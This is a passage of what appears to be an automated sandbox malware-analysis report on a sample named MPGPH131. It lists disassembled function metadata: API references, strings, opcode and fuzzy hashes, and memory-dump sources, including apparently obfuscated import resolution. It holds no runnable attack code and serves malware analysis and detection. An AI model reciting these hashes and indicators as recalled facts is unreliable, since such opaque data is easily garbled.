                                  • API ID: Heap$Allocate$AddressHandleModuleProcProcess
                                  • String ID:
                                  • API String ID: 3330366720-0
                                  • Opcode ID: 80b8550d54cecd6cb2b04c3f5873e4b191f9fc60e2468660b57773ef8028d0f9
                                  • Instruction ID: 74c70e1e05b9f7882dd127e91a0d8a487676367ac59226a2e56006733d196021
                                  • Opcode Fuzzy Hash: 80b8550d54cecd6cb2b04c3f5873e4b191f9fc60e2468660b57773ef8028d0f9
                                  • Instruction Fuzzy Hash: 8A41E731A04348ABDB10DFE9EC88B9EBBB9EF89324F10416DE90CE7251D67159448BA5
                                  APIs
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 005760F2
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 0057617F
                                  • ___std_exception_copy.LIBVCRUNTIME ref: 00576248
                                  Strings
                                  • recursive_directory_iterator::operator++, xrefs: 005761CC
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4457520263.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true
                                  • Associated: 00000008.00000002.4457341645.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457520263.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457520263.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457866140.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4459424895.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_570000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ___std_exception_destroy$___std_exception_copy
                                  • String ID: recursive_directory_iterator::operator++
                                  • API String ID: 1206660477-953255998
                                  • Opcode ID: 2b73455c5e14795d587cee27cc92188ce4cafdde59252b77546ebf66d903ad0a
                                  • Instruction ID: 94fb78dab9a06c4ea8486905a2b5b42bfd3881907d14ebba699ef4a96e3a9948
                                  • Opcode Fuzzy Hash: 2b73455c5e14795d587cee27cc92188ce4cafdde59252b77546ebf66d903ad0a
                                  • Instruction Fuzzy Hash: E0E115B09006059FDB28DF68D845B9EFBF9FF44310F10861EE45697781E774AA48CBA1
                                  APIs
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 005786DE
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 005786ED
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4457520263.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true
                                  • Associated: 00000008.00000002.4457341645.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457520263.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457520263.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457866140.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4459424895.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_570000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ___std_exception_destroy
                                  • String ID: at line $, column
                                  • API String ID: 4194217158-191570568
                                  • Opcode ID: 388e7977b9ae18869e6fc078aebbebeb935a0133428aed56804951e330c7aa44
                                  • Instruction ID: 6020f7aa3f7c89ccae9f9840e55fa33693aa118d5697cc9bf809f3051704ca38
                                  • Opcode Fuzzy Hash: 388e7977b9ae18869e6fc078aebbebeb935a0133428aed56804951e330c7aa44
                                  • Instruction Fuzzy Hash: D9613F71900204AFDB08CF68DC89BADBFB6FF54310F14821DE419A7782DB74AA849795
                                  APIs
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 005E3946
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 005E395F
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 005E3A97
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 005E3AB0
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 005E3C16
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 005E3C2F
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 005E4479
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 005E4492
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4457520263.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true
                                  • Associated: 00000008.00000002.4457341645.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457520263.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457520263.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457866140.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4459424895.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_570000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ___std_exception_destroy
                                  • String ID: value
                                  • API String ID: 4194217158-494360628
                                  • Opcode ID: 389300136a14fb1aefb9bb9f51709706e747904e90d9774e20e2989ad6d31912
                                  • Instruction ID: 2063a5277d8beb501146bb48b69c36a3d64032476f61f5054fc75d28bbe13a20
                                  • Opcode Fuzzy Hash: 389300136a14fb1aefb9bb9f51709706e747904e90d9774e20e2989ad6d31912
                                  • Instruction Fuzzy Hash: 5E519D71C00298DBDB14DBA4CC99B9EBFB5BF05304F148259E449A7382D7756A888B61
                                  APIs
                                  • ___std_exception_copy.LIBVCRUNTIME ref: 00573C0F
                                    • Part of subcall function 0064E96B: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,?,?,?,0064B17A,?,006A09CC,00000000,?,00000000,-006A65B0), ref: 0064E9CB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4457520263.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true
                                  • Associated: 00000008.00000002.4457341645.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457520263.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457520263.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457866140.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4459424895.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_570000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExceptionRaise___std_exception_copy
                                  • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                  • API String ID: 3109751735-1866435925
                                  • Opcode ID: f2b8f0b6e0dacafade04c0a9a450e01c7165e0e1a84456768d78c23678690c36
                                  • Instruction ID: 0d9caaa546c0001440cf2de3432e7ca636dc8f30e409ee65f6add67a7f9bdaf4
                                  • Opcode Fuzzy Hash: f2b8f0b6e0dacafade04c0a9a450e01c7165e0e1a84456768d78c23678690c36
                                  • Instruction Fuzzy Hash: 7F11F0B2900708ABC710DF68E805A9ABBEDBF05320F14C52AF95C9B641F771A9149BA1
                                  APIs
                                  • GetConsoleOutputCP.KERNEL32(FADDE7BB,00000000,00000000,?), ref: 00662685
                                    • Part of subcall function 00668463: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0066406B,?,00000000,-00000008), ref: 006684C4
                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 006628D7
                                  • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 0066291D
                                  • GetLastError.KERNEL32 ref: 006629C0
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4457520263.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true
                                  • Associated: 00000008.00000002.4457341645.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457520263.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457520263.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457866140.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4459424895.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_570000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                  • String ID:
                                  • API String ID: 2112829910-0
                                  • Opcode ID: a62f1481ad6d9ac293be52a7c779263690d720e0dc05d27b7a889ec89e52962d
                                  • Instruction ID: f17b1413410d9dca8c03b7b7d326bb3eb05e5e4af0e19ec35f7f7405bd07649d
                                  • Opcode Fuzzy Hash: a62f1481ad6d9ac293be52a7c779263690d720e0dc05d27b7a889ec89e52962d
                                  • Instruction Fuzzy Hash: 9BD19C75E006499FCF05CFE8D8909EDBBB6FF49310F18466AE456EB351D630A942CB50
                                  APIs
                                  • GetModuleHandleA.KERNEL32(B6BDACB9), ref: 0057A619
                                  • GetProcAddress.KERNEL32(00000000,AF88AC99), ref: 0057A624
                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,?), ref: 0057A6A2
                                  • SetEvent.KERNEL32(00000000), ref: 0057A6A9
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4457520263.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true
                                  • Associated: 00000008.00000002.4457341645.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457520263.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457520263.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457866140.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4459424895.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_570000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Event$AddressCreateHandleModuleProc
                                  • String ID:
                                  • API String ID: 2341598627-0
                                  • Opcode ID: ee9f8b35cf51ce4c90e999790022f32240235b902f37b4d3129c1c1922229809
                                  • Instruction ID: ce44afcf5519c3579bb0b83363dca2b88c9bb4940be3ec3b9a0b540ff07963ab
                                  • Opcode Fuzzy Hash: ee9f8b35cf51ce4c90e999790022f32240235b902f37b4d3129c1c1922229809
                                  • Instruction Fuzzy Hash: 7B31C171914388EAEF04DFE4DC09BEEBBB9EF18304F10006DE545AA251E7B25648C7A6
                                  APIs
                                  • WideCharToMultiByte.KERNEL32(?,00000400,?,?,?,?,00000000,00000000,?,?,?,005D979F,00000000,?,?,00000000), ref: 0064B322
                                  • GetLastError.KERNEL32(?,005D979F,00000000,?,?,00000000,00000000,?,?), ref: 0064B32E
                                  • WideCharToMultiByte.KERNEL32(?,00000000,?,?,?,?,00000000,00000000,?,005D979F,00000000,?,?,00000000,00000000,?), ref: 0064B354
                                  • GetLastError.KERNEL32(?,005D979F,00000000,?,?,00000000,00000000,?,?), ref: 0064B360
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4457520263.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true
                                  • Associated: 00000008.00000002.4457341645.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457520263.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457520263.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457866140.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4459424895.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_570000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ByteCharErrorLastMultiWide
                                  • String ID:
                                  • API String ID: 203985260-0
                                  • Opcode ID: e8352121b1e2d14478df51de9c48f4102c9df151a8fc5b30d06c12291fbe35cd
                                  • Instruction ID: dff0b9cac6ede44f8ec709af540abcc6cfaaef23b490fa9d951451b010822e2b
                                  • Opcode Fuzzy Hash: e8352121b1e2d14478df51de9c48f4102c9df151a8fc5b30d06c12291fbe35cd
                                  • Instruction Fuzzy Hash: 60017236600155BBCF231F56DC08D9F3E67FBD97A5B546024FE1555220C731C862E7A1
                                  APIs
                                  • WriteConsoleW.KERNEL32(00000000,00000000,00656AF7,00000000,00000000,?,0066E99F,00000000,00000001,?,?,?,00662A14,?,00000000,00000000), ref: 00671C39
                                  • GetLastError.KERNEL32(?,0066E99F,00000000,00000001,?,?,?,00662A14,?,00000000,00000000,?,?,?,00662FEE,00000000), ref: 00671C45
                                    • Part of subcall function 00671C0B: CloseHandle.KERNEL32(FFFFFFFE,00671C55,?,0066E99F,00000000,00000001,?,?,?,00662A14,?,00000000,00000000,?,?), ref: 00671C1B
                                  • ___initconout.LIBCMT ref: 00671C55
                                    • Part of subcall function 00671BCD: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00671BFC,0066E98C,?,?,00662A14,?,00000000,00000000,?), ref: 00671BE0
                                  • WriteConsoleW.KERNEL32(00000000,00000000,00656AF7,00000000,?,0066E99F,00000000,00000001,?,?,?,00662A14,?,00000000,00000000,?), ref: 00671C6A
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4457520263.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true
                                  • Associated: 00000008.00000002.4457341645.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457520263.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457520263.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457866140.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4459424895.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_570000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                  • String ID:
                                  • API String ID: 2744216297-0
                                  • Opcode ID: 818ff077e8b47b57c76a38f1ff6e9370c9cd0581a008383efa80f9e30f0ba558
                                  • Instruction ID: af2f14e9fee3c8f912861ca6fa16226ec524f9f9829eb3809ce26e06098267bd
                                  • Opcode Fuzzy Hash: 818ff077e8b47b57c76a38f1ff6e9370c9cd0581a008383efa80f9e30f0ba558
                                  • Instruction Fuzzy Hash: 08F01C36140129BBCF226FD9DC08A893F27FB0A3A1F008119FA1D99620C632C9609B90
                                  Strings
                                  • unordered_map/set too long, xrefs: 005E2F43
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4457520263.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true
                                  • Associated: 00000008.00000002.4457341645.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457520263.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457520263.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457866140.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4459424895.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_570000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: unordered_map/set too long
                                  • API String ID: 0-306623848
                                  • Opcode ID: ac96d36ac91a1ded2ad4e5f893d5ebdcaefcd6de770654d9d4cd7c37a63712f6
                                  • Instruction ID: 0572a0fc90abdac97d34035cbdb5c0b3affa57a6f1548e447d6c34aa93b5a78a
                                  • Opcode Fuzzy Hash: ac96d36ac91a1ded2ad4e5f893d5ebdcaefcd6de770654d9d4cd7c37a63712f6
                                  • Instruction Fuzzy Hash: 16E1F571A001459FCB18DF69C885A6DBBB9FF88310F24836AE859DB395E730ED41CB90
                                  APIs
                                  • ___std_exception_copy.LIBVCRUNTIME ref: 0057844D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4457520263.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true
                                  • Associated: 00000008.00000002.4457341645.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457520263.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457520263.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457866140.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4459424895.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_570000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ___std_exception_copy
                                  • String ID: parse error$ror
                                  • API String ID: 2659868963-4201802366
                                  • Opcode ID: 02c59634e9b8c7c7a731144dabbdfa952a9ed72f14cac93897f9034302d3c3c9
                                  • Instruction ID: 80d1fa4a4c241bb656b9895fb3e782abb6bb315f31c8fd7d556fcef8972cf41b
                                  • Opcode Fuzzy Hash: 02c59634e9b8c7c7a731144dabbdfa952a9ed72f14cac93897f9034302d3c3c9
                                  • Instruction Fuzzy Hash: A4C10671D106498FEB08CF68DC88BADBB72BF55304F14C24DE008AB792DBB49684DB91
                                  APIs
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 00578051
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 00578060
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4457520263.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true
                                  • Associated: 00000008.00000002.4457341645.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457520263.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457520263.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457866140.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4459424895.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_570000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ___std_exception_destroy
                                  • String ID: [json.exception.
                                  • API String ID: 4194217158-791563284
                                  • Opcode ID: 055f89fcbf9ca259ca5448822265f3d12304b82d7286e48af308dcd21b1e024b
                                  • Instruction ID: daa32e71712766b3de9640baf24465b9050d8dad48f228090f175965fddd81bc
                                  • Opcode Fuzzy Hash: 055f89fcbf9ca259ca5448822265f3d12304b82d7286e48af308dcd21b1e024b
                                  • Instruction Fuzzy Hash: 3B9116709002089FDB18CFA8DC89BAEBFB6FF45314F14825DE404AB792D774AA84D791
                                  APIs
                                  • ___std_exception_copy.LIBVCRUNTIME ref: 00573C0F
                                    • Part of subcall function 0064E96B: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,?,?,?,0064B17A,?,006A09CC,00000000,?,00000000,-006A65B0), ref: 0064E9CB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4457520263.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true
                                  • Associated: 00000008.00000002.4457341645.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457520263.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457520263.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457866140.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4459424895.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_570000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExceptionRaise___std_exception_copy
                                  • String ID: ios_base::badbit set$ios_base::failbit set
                                  • API String ID: 3109751735-1240500531
                                  • Opcode ID: e58c1d961fee7ac21f141663b8c44451a8bb7e981d07e12a3aced7b5ee629868
                                  • Instruction ID: c8043547520b72f85efa22c8b1e067a8f09e83ca2d5cc74fb0b1df1e2a57f2dd
                                  • Opcode Fuzzy Hash: e58c1d961fee7ac21f141663b8c44451a8bb7e981d07e12a3aced7b5ee629868
